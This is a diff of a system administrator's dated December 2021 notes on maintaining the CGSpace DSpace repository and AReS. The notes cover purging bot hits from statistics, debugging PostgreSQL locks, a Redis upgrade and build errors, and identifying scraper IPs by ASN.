                                                                                                                                                                                                                                                                                                                                                        $ ./ilri/check-spider-hits.sh -f dspace/config/spiders/agents/ilri -p
                                                                                                                                                                                                                                                                                                                                                        -Purging 34458 hits from HeadlessChrome in statistics
                                                                                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                                                                                        -Total number of bot hits purged: 34458
                                                                                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                                                          $ ./ilri/check-spider-hits.sh -f dspace/config/spiders/agents/ilri -p
                                                                                                                                                                                                                                                                                                                                                          +Purging 34458 hits from HeadlessChrome in statistics
                                                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                                                          +Total number of bot hits purged: 34458
                                                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                                                          • Meeting with partners about repositories in the One CGIAR

                                                                                                                                                                                                                                                                                                                                                          2021-12-08

                                                                                                                                                                                                                                                                                                                                                          @@ -307,26 +307,26 @@ Purging 34458 hits from HeadlessChrome in statistics
                                                                                                                                                                                                                                                                                                                                                          • I finally caught some stuck locks on CGSpace after checking several times per day for the last week:
                                                                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                                                                          $ psql -c "SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid" | wc -l
                                                                                                                                                                                                                                                                                                                                                          -1508
                                                                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                                                                                            $ psql -c "SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid" | wc -l
                                                                                                                                                                                                                                                                                                                                                            +1508
                                                                                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                                                                                            • Now looking at the locks query sorting by age of locks:
                                                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                                                            $ cat locks-age.sql 
                                                                                                                                                                                                                                                                                                                                                            -SELECT a.datname,
                                                                                                                                                                                                                                                                                                                                                            -         l.relation::regclass,
                                                                                                                                                                                                                                                                                                                                                            -         l.transactionid,
                                                                                                                                                                                                                                                                                                                                                            -         l.mode,
                                                                                                                                                                                                                                                                                                                                                            -         l.GRANTED,
                                                                                                                                                                                                                                                                                                                                                            -         a.usename,
                                                                                                                                                                                                                                                                                                                                                            -         a.query,
                                                                                                                                                                                                                                                                                                                                                            -         a.query_start,
                                                                                                                                                                                                                                                                                                                                                            -         age(now(), a.query_start) AS "age",
                                                                                                                                                                                                                                                                                                                                                            -         a.pid
                                                                                                                                                                                                                                                                                                                                                            -FROM pg_stat_activity a
                                                                                                                                                                                                                                                                                                                                                            -JOIN pg_locks l ON l.pid = a.pid
                                                                                                                                                                                                                                                                                                                                                            -ORDER BY a.query_start;
                                                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                                              $ cat locks-age.sql 
                                                                                                                                                                                                                                                                                                                                                              +SELECT a.datname,
                                                                                                                                                                                                                                                                                                                                                              +         l.relation::regclass,
                                                                                                                                                                                                                                                                                                                                                              +         l.transactionid,
                                                                                                                                                                                                                                                                                                                                                              +         l.mode,
                                                                                                                                                                                                                                                                                                                                                              +         l.GRANTED,
                                                                                                                                                                                                                                                                                                                                                              +         a.usename,
                                                                                                                                                                                                                                                                                                                                                              +         a.query,
                                                                                                                                                                                                                                                                                                                                                              +         a.query_start,
                                                                                                                                                                                                                                                                                                                                                              +         age(now(), a.query_start) AS "age",
                                                                                                                                                                                                                                                                                                                                                              +         a.pid
                                                                                                                                                                                                                                                                                                                                                              +FROM pg_stat_activity a
                                                                                                                                                                                                                                                                                                                                                              +JOIN pg_locks l ON l.pid = a.pid
                                                                                                                                                                                                                                                                                                                                                              +ORDER BY a.query_start;
                                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                                              • The oldest locks are 9 hours and 26 minutes old and the time on the server is Tue Dec 14 18:41:58 CET 2021, so it seems something happened around 9:15 this morning
                                                                                                                                                                                                                                                                                                                                                                • I looked at the maintenance tasks and there is nothing running around then (only the sitemap update that runs at 8AM, and should be quick)
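The "around 9:15" estimate above follows from subtracting the age of the oldest lock from the server time. A minimal sketch of that arithmetic, assuming naive local timestamps (the CET offset is ignored, since both values come from the same server) and a hypothetical helper name `lock_start`:

```python
from datetime import datetime, timedelta


def lock_start(server_now: datetime, lock_age: timedelta) -> datetime:
    """Return the moment the lock was taken, given the current time and its age."""
    return server_now - lock_age


# Values copied from the notes: server time and the age of the oldest lock.
server_now = datetime(2021, 12, 14, 18, 41, 58)
oldest_lock_age = timedelta(hours=9, minutes=26)

started = lock_start(server_now, oldest_lock_age)
print(started.strftime("%H:%M"))  # 09:15
```

This only confirms the rough start time; it says nothing about which process took the locks.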
                                                                                                                                                                                                                                                                                                                                                                • @@ -354,25 +354,25 @@ ORDER BY a.query_start;
                                                                                                                                                                                                                                                                                                                                                                • I created a SAF archive with SAFBuilder and then imported it to DSpace Test:
                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                $ JAVA_OPTS="-Xmx1024m -Dfile.encoding=UTF-8" dspace import --add --eperson=fuuu@fuuu.com --source /tmp/SimpleArchiveFormat --mapfile=./2021-12-16-green-covers.map
                                                                                                                                                                                                                                                                                                                                                                -

                                                                                                                                                                                                                                                                                                                                                                2021-12-19

                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                $ JAVA_OPTS="-Xmx1024m -Dfile.encoding=UTF-8" dspace import --add --eperson=fuuu@fuuu.com --source /tmp/SimpleArchiveFormat --mapfile=./2021-12-16-green-covers.map
                                                                                                                                                                                                                                                                                                                                                                +

                                                                                                                                                                                                                                                                                                                                                                2021-12-19

                                                                                                                                                                                                                                                                                                                                                                • I tried to update all Docker containers on AReS and then run a build, but I got an error in the backend:
                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                > openrxv-backend@0.0.1 build
                                                                                                                                                                                                                                                                                                                                                                -> nest build
                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                -node_modules/@elastic/elasticsearch/api/types.d.ts:2454:13 - error TS2456: Type alias 'AggregationsAggregate' circularly references itself.
                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                -2454 export type AggregationsAggregate = AggregationsSingleBucketAggregate | AggregationsAutoDateHistogramAggregate | AggregationsFiltersAggregate | AggregationsSignificantTermsAggregate<any> | AggregationsTermsAggregate<any> | AggregationsBucketAggregate | AggregationsCompositeBucketAggregate | AggregationsMultiBucketAggregate<AggregationsBucket> | AggregationsMatrixStatsAggregate | AggregationsKeyedValueAggregate | AggregationsMetricAggregate
                                                                                                                                                                                                                                                                                                                                                                -                 ~~~~~~~~~~~~~~~~~~~~~
                                                                                                                                                                                                                                                                                                                                                                -node_modules/@elastic/elasticsearch/api/types.d.ts:3209:13 - error TS2456: Type alias 'AggregationsSingleBucketAggregate' circularly references itself.
                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                -3209 export type AggregationsSingleBucketAggregate = AggregationsSingleBucketAggregateKeys
                                                                                                                                                                                                                                                                                                                                                                -                 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                -Found 2 error(s).
                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                                  > openrxv-backend@0.0.1 build
                                                                                                                                                                                                                                                                                                                                                                  +> nest build
                                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                                  +node_modules/@elastic/elasticsearch/api/types.d.ts:2454:13 - error TS2456: Type alias 'AggregationsAggregate' circularly references itself.
                                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                                  +2454 export type AggregationsAggregate = AggregationsSingleBucketAggregate | AggregationsAutoDateHistogramAggregate | AggregationsFiltersAggregate | AggregationsSignificantTermsAggregate<any> | AggregationsTermsAggregate<any> | AggregationsBucketAggregate | AggregationsCompositeBucketAggregate | AggregationsMultiBucketAggregate<AggregationsBucket> | AggregationsMatrixStatsAggregate | AggregationsKeyedValueAggregate | AggregationsMetricAggregate
                                                                                                                                                                                                                                                                                                                                                                  +                 ~~~~~~~~~~~~~~~~~~~~~
                                                                                                                                                                                                                                                                                                                                                                  +node_modules/@elastic/elasticsearch/api/types.d.ts:3209:13 - error TS2456: Type alias 'AggregationsSingleBucketAggregate' circularly references itself.
                                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                                  +3209 export type AggregationsSingleBucketAggregate = AggregationsSingleBucketAggregateKeys
                                                                                                                                                                                                                                                                                                                                                                  +                 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                                  +Found 2 error(s).
                                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                                  • I’m not sure why because I build the backend successfully on my local machine…
                                                                                                                                                                                                                                                                                                                                                                    • For now I just ran all the system updates and rebooted the machine (linode20)
                                                                                                                                                                                                                                                                                                                                                                    • @@ -389,39 +389,39 @@ node_modules/@elastic/elasticsearch/api/types.d.ts:3209:13 - error TS2456: Type
                                                                                                                                                                                                                                                                                                                                                                    • But since software sucks, now I get an error in the frontend while starting nginx:
                                                                                                                                                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                                                                                                                                                    nginx: [emerg] host not found in upstream "backend:3000" in /etc/nginx/conf.d/default.conf:2
                                                                                                                                                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                                                                                                                                                      nginx: [emerg] host not found in upstream "backend:3000" in /etc/nginx/conf.d/default.conf:2
                                                                                                                                                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                                                                                                                                                      • In other news, looking at updating our Redis from version 5 to 6 (which is slightly less old, but still old!) and I’m happy to see that the release notes for version 6 say that it is compatible with 5 except for one minor thing that we don’t seem to be using (SPOP?)
                                                                                                                                                                                                                                                                                                                                                                      • For reference I see that our Redis 5 container is based on Debian 11, which I didn’t expect… but I still want to try to upgrade to Redis 6 eventually:
                                                                                                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                                                                                                      $ docker exec -it redis bash
                                                                                                                                                                                                                                                                                                                                                                      -root@23692d6b51c5:/data# cat /etc/os-release 
                                                                                                                                                                                                                                                                                                                                                                      -PRETTY_NAME="Debian GNU/Linux 11 (bullseye)"
                                                                                                                                                                                                                                                                                                                                                                      -NAME="Debian GNU/Linux"
                                                                                                                                                                                                                                                                                                                                                                      -VERSION_ID="11"
                                                                                                                                                                                                                                                                                                                                                                      -VERSION="11 (bullseye)"
                                                                                                                                                                                                                                                                                                                                                                      -VERSION_CODENAME=bullseye
                                                                                                                                                                                                                                                                                                                                                                      -ID=debian
                                                                                                                                                                                                                                                                                                                                                                      -HOME_URL="https://www.debian.org/"
                                                                                                                                                                                                                                                                                                                                                                      -SUPPORT_URL="https://www.debian.org/support"
                                                                                                                                                                                                                                                                                                                                                                      -BUG_REPORT_URL="https://bugs.debian.org/"
                                                                                                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                                                                                                                                                        $ docker exec -it redis bash
                                                                                                                                                                                                                                                                                                                                                                        +root@23692d6b51c5:/data# cat /etc/os-release 
                                                                                                                                                                                                                                                                                                                                                                        +PRETTY_NAME="Debian GNU/Linux 11 (bullseye)"
                                                                                                                                                                                                                                                                                                                                                                        +NAME="Debian GNU/Linux"
                                                                                                                                                                                                                                                                                                                                                                        +VERSION_ID="11"
                                                                                                                                                                                                                                                                                                                                                                        +VERSION="11 (bullseye)"
                                                                                                                                                                                                                                                                                                                                                                        +VERSION_CODENAME=bullseye
                                                                                                                                                                                                                                                                                                                                                                        +ID=debian
                                                                                                                                                                                                                                                                                                                                                                        +HOME_URL="https://www.debian.org/"
                                                                                                                                                                                                                                                                                                                                                                        +SUPPORT_URL="https://www.debian.org/support"
                                                                                                                                                                                                                                                                                                                                                                        +BUG_REPORT_URL="https://bugs.debian.org/"
                                                                                                                                                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                                                                                                                                                        • I bumped the version to 6 on my local test machine and the logs look good:
                                                                                                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                                                                                                        $ docker logs redis
                                                                                                                                                                                                                                                                                                                                                                        -1:C 19 Dec 2021 19:27:15.583 # oO0OoO0OoO0Oo Redis is starting oO0OoO0OoO0Oo
                                                                                                                                                                                                                                                                                                                                                                        -1:C 19 Dec 2021 19:27:15.583 # Redis version=6.2.6, bits=64, commit=00000000, modified=0, pid=1, just started
                                                                                                                                                                                                                                                                                                                                                                        -1:C 19 Dec 2021 19:27:15.583 # Warning: no config file specified, using the default config. In order to specify a config file use redis-server /path/to/redis.conf
                                                                                                                                                                                                                                                                                                                                                                        -1:M 19 Dec 2021 19:27:15.584 * monotonic clock: POSIX clock_gettime
                                                                                                                                                                                                                                                                                                                                                                        -1:M 19 Dec 2021 19:27:15.584 * Running mode=standalone, port=6379.
                                                                                                                                                                                                                                                                                                                                                                        -1:M 19 Dec 2021 19:27:15.584 # Server initialized
                                                                                                                                                                                                                                                                                                                                                                        -1:M 19 Dec 2021 19:27:15.585 * Loading RDB produced by version 5.0.14
                                                                                                                                                                                                                                                                                                                                                                        -1:M 19 Dec 2021 19:27:15.585 * RDB age 33 seconds
                                                                                                                                                                                                                                                                                                                                                                        -1:M 19 Dec 2021 19:27:15.585 * RDB memory usage when created 3.17 Mb
                                                                                                                                                                                                                                                                                                                                                                        -1:M 19 Dec 2021 19:27:15.595 # Done loading RDB, keys loaded: 932, keys expired: 1.
                                                                                                                                                                                                                                                                                                                                                                        -1:M 19 Dec 2021 19:27:15.595 * DB loaded from disk: 0.011 seconds
                                                                                                                                                                                                                                                                                                                                                                        -1:M 19 Dec 2021 19:27:15.595 * Ready to accept connections
                                                                                                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                                                                          $ docker logs redis
                                                                                                                                                                                                                                                                                                                                                                          +1:C 19 Dec 2021 19:27:15.583 # oO0OoO0OoO0Oo Redis is starting oO0OoO0OoO0Oo
                                                                                                                                                                                                                                                                                                                                                                          +1:C 19 Dec 2021 19:27:15.583 # Redis version=6.2.6, bits=64, commit=00000000, modified=0, pid=1, just started
                                                                                                                                                                                                                                                                                                                                                                          +1:C 19 Dec 2021 19:27:15.583 # Warning: no config file specified, using the default config. In order to specify a config file use redis-server /path/to/redis.conf
                                                                                                                                                                                                                                                                                                                                                                          +1:M 19 Dec 2021 19:27:15.584 * monotonic clock: POSIX clock_gettime
                                                                                                                                                                                                                                                                                                                                                                          +1:M 19 Dec 2021 19:27:15.584 * Running mode=standalone, port=6379.
                                                                                                                                                                                                                                                                                                                                                                          +1:M 19 Dec 2021 19:27:15.584 # Server initialized
                                                                                                                                                                                                                                                                                                                                                                          +1:M 19 Dec 2021 19:27:15.585 * Loading RDB produced by version 5.0.14
                                                                                                                                                                                                                                                                                                                                                                          +1:M 19 Dec 2021 19:27:15.585 * RDB age 33 seconds
                                                                                                                                                                                                                                                                                                                                                                          +1:M 19 Dec 2021 19:27:15.585 * RDB memory usage when created 3.17 Mb
                                                                                                                                                                                                                                                                                                                                                                          +1:M 19 Dec 2021 19:27:15.595 # Done loading RDB, keys loaded: 932, keys expired: 1.
                                                                                                                                                                                                                                                                                                                                                                          +1:M 19 Dec 2021 19:27:15.595 * DB loaded from disk: 0.011 seconds
                                                                                                                                                                                                                                                                                                                                                                          +1:M 19 Dec 2021 19:27:15.595 * Ready to accept connections
                                                                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                                                                          • The interface and harvesting all work as expected…
                                                                                                                                                                                                                                                                                                                                                                            • I pushed the update to OpenRXV
                                                                                                                                                                                                                                                                                                                                                                            • @@ -443,8 +443,8 @@ BUG_REPORT_URL="https://bugs.debian.org/"
                                                                                                                                                                                                                                                                                                                                                                            • Move invalid AGROVOC subjects in Gaia’s eighteen green cover items on DSpace Test to cg.subject.system
                                                                                                                                                                                                                                                                                                                                                                            • I created an “approve” user for Rafael from CIAT to do tests on DSpace Test:
                                                                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                                                                            $ dspace user -a -m rafael-approve@cgiar.org -g Rafael -s Rodriguez -p 'fuuuuuu'
                                                                                                                                                                                                                                                                                                                                                                            -

                                                                                                                                                                                                                                                                                                                                                                            2021-12-27

                                                                                                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                                                                                                            $ dspace user -a -m rafael-approve@cgiar.org -g Rafael -s Rodriguez -p 'fuuuuuu'
                                                                                                                                                                                                                                                                                                                                                                            +

                                                                                                                                                                                                                                                                                                                                                                            2021-12-27

                                                                                                                                                                                                                                                                                                                                                                            • Start a fresh harvest on AReS
                                                                                                                                                                                                                                                                                                                                                                            @@ -452,8 +452,8 @@ BUG_REPORT_URL="https://bugs.debian.org/"
                                                                                                                                                                                                                                                                                                                                                                            • Looking at the top IPs and user agents on CGSpace’s Solr statistics I see a strange user agent:
                                                                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                                                                            Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.{random.randint(0, 9999)} Safari/537.{random.randint(0, 99)}
                                                                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                                                              Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.{random.randint(0, 9999)} Safari/537.{random.randint(0, 99)}
                                                                                                                                                                                                                                                                                                                                                                              +
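The literal `{random.randint(0, 9999)}` in the user agent above looks like a Python replacement field that was never expanded, possibly because the client built the string without the `f` prefix. That is a guess about the client, not something the logs confirm. A minimal sketch of how such agents could be flagged, assuming a hypothetical helper `has_unexpanded_template` and a hand-written pattern that is not part of any existing script:

```python
import re

# Hypothetical pattern: a brace-wrapped call such as "{random.randint(0, 9999)}"
# that was left verbatim in a user agent instead of being expanded.
UNEXPANDED_FIELD = re.compile(r"\{[A-Za-z_][\w.]*\([^{}]*\)\}")


def has_unexpanded_template(user_agent: str) -> bool:
    """Return True if the user agent contains a literal, unexpanded template field."""
    return UNEXPANDED_FIELD.search(user_agent) is not None


# The agent seen in the Solr statistics, copied verbatim.
broken = (
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
    "(KHTML, like Gecko) Chrome/79.0.3945.{random.randint(0, 9999)} "
    "Safari/537.{random.randint(0, 99)}"
)

# An illustrative well-formed agent (assumed for comparison only).
normal = (
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
    "(KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36"
)

if __name__ == "__main__":
    for agent in (broken, normal):
        print(has_unexpanded_template(agent), agent[:60])
```

Matching on the brace-wrapped call rather than on the word `randint` alone keeps the check narrow, so ordinary agents containing parentheses or braces elsewhere are less likely to be flagged.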
                                                                                                                                                                                                                                                                                                                                                                              • I found two IPs using user agents with the “randint” bug:
                                                                                                                                                                                                                                                                                                                                                                                • 47.252.80.214 (AliCloud in the US)
                                                                                                                                                                                                                                                                                                                                                                                • @@ -469,26 +469,26 @@ BUG_REPORT_URL="https://bugs.debian.org/"
                                                                                                                                                                                                                                                                                                                                                                                • 3.225.28.105 is on Amazon and making thousands of requests for the same URL:
                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                /rest/collections/1118/items?expand=all&limit=1
                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                                                  /rest/collections/1118/items?expand=all&limit=1
                                                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                                                  • Most of the time it has a real-looking user agent, but sometimes it uses Apache-HttpClient/4.3.4 (java 1.5)
                                                                                                                                                                                                                                                                                                                                                                                  • Another 82.65.26.228 is doing SQL injection attempts from France
                                                                                                                                                                                                                                                                                                                                                                                  • 216.213.28.138 is some scrape-as-a-service bot from Sprious
                                                                                                                                                                                                                                                                                                                                                                                  • I used my resolve-addresses-geoip2.py script to get the ASNs for all the IPs in Solr stats this month, then extracted the ASNs that were responsible for more than one IP:
                                                                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                                                                  $ ./ilri/resolve-addresses-geoip2.py -i /tmp/ips.txt -o /tmp/2021-12-29-ips.csv
                                                                                                                                                                                                                                                                                                                                                                                  -$ csvcut -c asn /tmp/2021-12-29-ips.csv | sed 1d | sort | uniq -c | sort -h | awk '$1 > 1'
                                                                                                                                                                                                                                                                                                                                                                                  -      2 10620
                                                                                                                                                                                                                                                                                                                                                                                  -      2 265696
                                                                                                                                                                                                                                                                                                                                                                                  -      2 6147
                                                                                                                                                                                                                                                                                                                                                                                  -      2 9299
                                                                                                                                                                                                                                                                                                                                                                                  -      3 3269
                                                                                                                                                                                                                                                                                                                                                                                  -      5 16509
                                                                                                                                                                                                                                                                                                                                                                                  -      5 49505
                                                                                                                                                                                                                                                                                                                                                                                  -      9 24757
                                                                                                                                                                                                                                                                                                                                                                                  -      9 24940
                                                                                                                                                                                                                                                                                                                                                                                  -      9 64267
                                                                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                                                                                                    $ ./ilri/resolve-addresses-geoip2.py -i /tmp/ips.txt -o /tmp/2021-12-29-ips.csv
                                                                                                                                                                                                                                                                                                                                                                                    +$ csvcut -c asn /tmp/2021-12-29-ips.csv | sed 1d | sort | uniq -c | sort -h | awk '$1 > 1'
                                                                                                                                                                                                                                                                                                                                                                                    +      2 10620
                                                                                                                                                                                                                                                                                                                                                                                    +      2 265696
                                                                                                                                                                                                                                                                                                                                                                                    +      2 6147
                                                                                                                                                                                                                                                                                                                                                                                    +      2 9299
                                                                                                                                                                                                                                                                                                                                                                                    +      3 3269
                                                                                                                                                                                                                                                                                                                                                                                    +      5 16509
                                                                                                                                                                                                                                                                                                                                                                                    +      5 49505
                                                                                                                                                                                                                                                                                                                                                                                    +      9 24757
                                                                                                                                                                                                                                                                                                                                                                                    +      9 24940
                                                                                                                                                                                                                                                                                                                                                                                    +      9 64267
                                                                                                                                                                                                                                                                                                                                                                                    +
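A rough Python equivalent of the `csvcut | sort | uniq -c | awk` pipeline above, as a sketch only. It assumes the CSV written by `resolve-addresses-geoip2.py` has an `asn` column (as the `csvcut -c asn` call implies); the `ip` column name and the sample rows are made up for illustration.

```python
import csv
import io
from collections import Counter


def repeated_asns(csv_file, column="asn", min_count=2):
    """Return (count, asn) pairs for ASNs seen at least min_count times.

    Pairs are sorted ascending by count, with ties broken by the ASN string.
    """
    reader = csv.DictReader(csv_file)
    counts = Counter(row[column] for row in reader)
    pairs = [(n, asn) for asn, n in counts.items() if n >= min_count]
    return sorted(pairs)


# Hypothetical sample rows; the real input would be /tmp/2021-12-29-ips.csv
sample = io.StringIO("ip,asn\n192.0.2.1,64267\n192.0.2.2,64267\n192.0.2.3,3269\n")
for n, asn in repeated_asns(sample):
    print(f"{n:7d} {asn}")
```

With `min_count=2` this mirrors the `awk '$1 > 1'` filter, which drops ASNs that appear only once.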
                                                                                                                                                                                                                                                                                                                                                                                    • AS 64267 is Sprious, and it has used these IPs this month:
                                                                                                                                                                                                                                                                                                                                                                                      • 216.213.28.136
@@ -526,37 +526,37 @@ $ csvcut -c asn /tmp/2021-12-29-ips.csv | sed 1d | sort | uniq -c | sort -h | aw
                                                                                                                                                                                                                                                                                                                                                                                      • I ran the script to purge spider agents with the latest updates:
                                                                                                                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                                                                                                                      $ ./ilri/check-spider-hits.sh -f dspace/config/spiders/agents/ilri -p
                                                                                                                                                                                                                                                                                                                                                                                      -Purging 2530 hits from HeadlessChrome in statistics
                                                                                                                                                                                                                                                                                                                                                                                      -Purging 10676 hits from randint in statistics
                                                                                                                                                                                                                                                                                                                                                                                      -Purging 3579 hits from Koha in statistics
                                                                                                                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                                                                                                                      -Total number of bot hits purged: 16785
                                                                                                                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                                                                                                                                                                        $ ./ilri/check-spider-hits.sh -f dspace/config/spiders/agents/ilri -p
                                                                                                                                                                                                                                                                                                                                                                                        +Purging 2530 hits from HeadlessChrome in statistics
                                                                                                                                                                                                                                                                                                                                                                                        +Purging 10676 hits from randint in statistics
                                                                                                                                                                                                                                                                                                                                                                                        +Purging 3579 hits from Koha in statistics
                                                                                                                                                                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                                                                                                                                                                        +Total number of bot hits purged: 16785
                                                                                                                                                                                                                                                                                                                                                                                        +
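A quick way to sanity check the reported total against the per-agent lines, as a minimal sketch. It assumes the log lines keep the `Purging N hits from X in statistics` shape shown above; the function name `sum_purged` is my own and not part of `check-spider-hits.sh`.

```python
import re

# Matches the per-pattern lines printed by the purge run above
PURGE_LINE = re.compile(r"^Purging (\d+) hits from (.+) in statistics$")


def sum_purged(log_text):
    """Sum the hit counts from 'Purging N hits from X in statistics' lines."""
    total = 0
    for line in log_text.splitlines():
        match = PURGE_LINE.match(line.strip())
        if match:
            total += int(match.group(1))
    return total


log = """\
Purging 2530 hits from HeadlessChrome in statistics
Purging 10676 hits from randint in statistics
Purging 3579 hits from Koha in statistics
"""
print(sum_purged(log))  # 16785, the same as the reported total
```

Lines that do not match the pattern (blank lines, the total line itself) are skipped, so the whole console output can be pasted in as-is.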
                                                                                                                                                                                                                                                                                                                                                                                        • Then the IPs:
                                                                                                                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                                                                                                                        $ ./ilri/check-spider-ip-hits.sh -f /tmp/ips-to-purge.txt -p
                                                                                                                                                                                                                                                                                                                                                                                        -Purging 1190 hits from 216.213.28.136 in statistics
                                                                                                                                                                                                                                                                                                                                                                                        -Purging 1128 hits from 207.182.27.191 in statistics
                                                                                                                                                                                                                                                                                                                                                                                        -Purging 1095 hits from 216.41.235.187 in statistics
                                                                                                                                                                                                                                                                                                                                                                                        -Purging 1087 hits from 216.41.232.169 in statistics
                                                                                                                                                                                                                                                                                                                                                                                        -Purging 1011 hits from 216.41.235.186 in statistics
                                                                                                                                                                                                                                                                                                                                                                                        -Purging 945 hits from 52.124.19.190 in statistics
                                                                                                                                                                                                                                                                                                                                                                                        -Purging 933 hits from 216.213.28.138 in statistics
                                                                                                                                                                                                                                                                                                                                                                                        -Purging 930 hits from 216.41.234.163 in statistics
                                                                                                                                                                                                                                                                                                                                                                                        -Purging 4410 hits from 45.146.166.173 in statistics
                                                                                                                                                                                                                                                                                                                                                                                        -Purging 2688 hits from 45.134.26.171 in statistics
                                                                                                                                                                                                                                                                                                                                                                                        -Purging 1130 hits from 45.146.164.123 in statistics
                                                                                                                                                                                                                                                                                                                                                                                        -Purging 536 hits from 45.155.205.231 in statistics
                                                                                                                                                                                                                                                                                                                                                                                        -Purging 10676 hits from 195.54.167.122 in statistics
                                                                                                                                                                                                                                                                                                                                                                                        -Purging 1350 hits from 54.76.137.83 in statistics
                                                                                                                                                                                                                                                                                                                                                                                        -Purging 1240 hits from 34.253.119.85 in statistics
                                                                                                                                                                                                                                                                                                                                                                                        -Purging 2879 hits from 34.216.201.131 in statistics
                                                                                                                                                                                                                                                                                                                                                                                        -Purging 2909 hits from 54.203.193.46 in statistics
                                                                                                                                                                                                                                                                                                                                                                                        -Purging 1822 hits from 2605\:b100\:316\:7f74\:8d67\:5860\:a9f3\:d87c in statistics
                                                                                                                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                                                                                                                        -Total number of bot hits purged: 37959
                                                                                                                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                                                                                                                                                                        $ ./ilri/check-spider-ip-hits.sh -f /tmp/ips-to-purge.txt -p
                                                                                                                                                                                                                                                                                                                                                                                        +Purging 1190 hits from 216.213.28.136 in statistics
                                                                                                                                                                                                                                                                                                                                                                                        +Purging 1128 hits from 207.182.27.191 in statistics
                                                                                                                                                                                                                                                                                                                                                                                        +Purging 1095 hits from 216.41.235.187 in statistics
                                                                                                                                                                                                                                                                                                                                                                                        +Purging 1087 hits from 216.41.232.169 in statistics
                                                                                                                                                                                                                                                                                                                                                                                        +Purging 1011 hits from 216.41.235.186 in statistics
                                                                                                                                                                                                                                                                                                                                                                                        +Purging 945 hits from 52.124.19.190 in statistics
                                                                                                                                                                                                                                                                                                                                                                                        +Purging 933 hits from 216.213.28.138 in statistics
                                                                                                                                                                                                                                                                                                                                                                                        +Purging 930 hits from 216.41.234.163 in statistics
                                                                                                                                                                                                                                                                                                                                                                                        +Purging 4410 hits from 45.146.166.173 in statistics
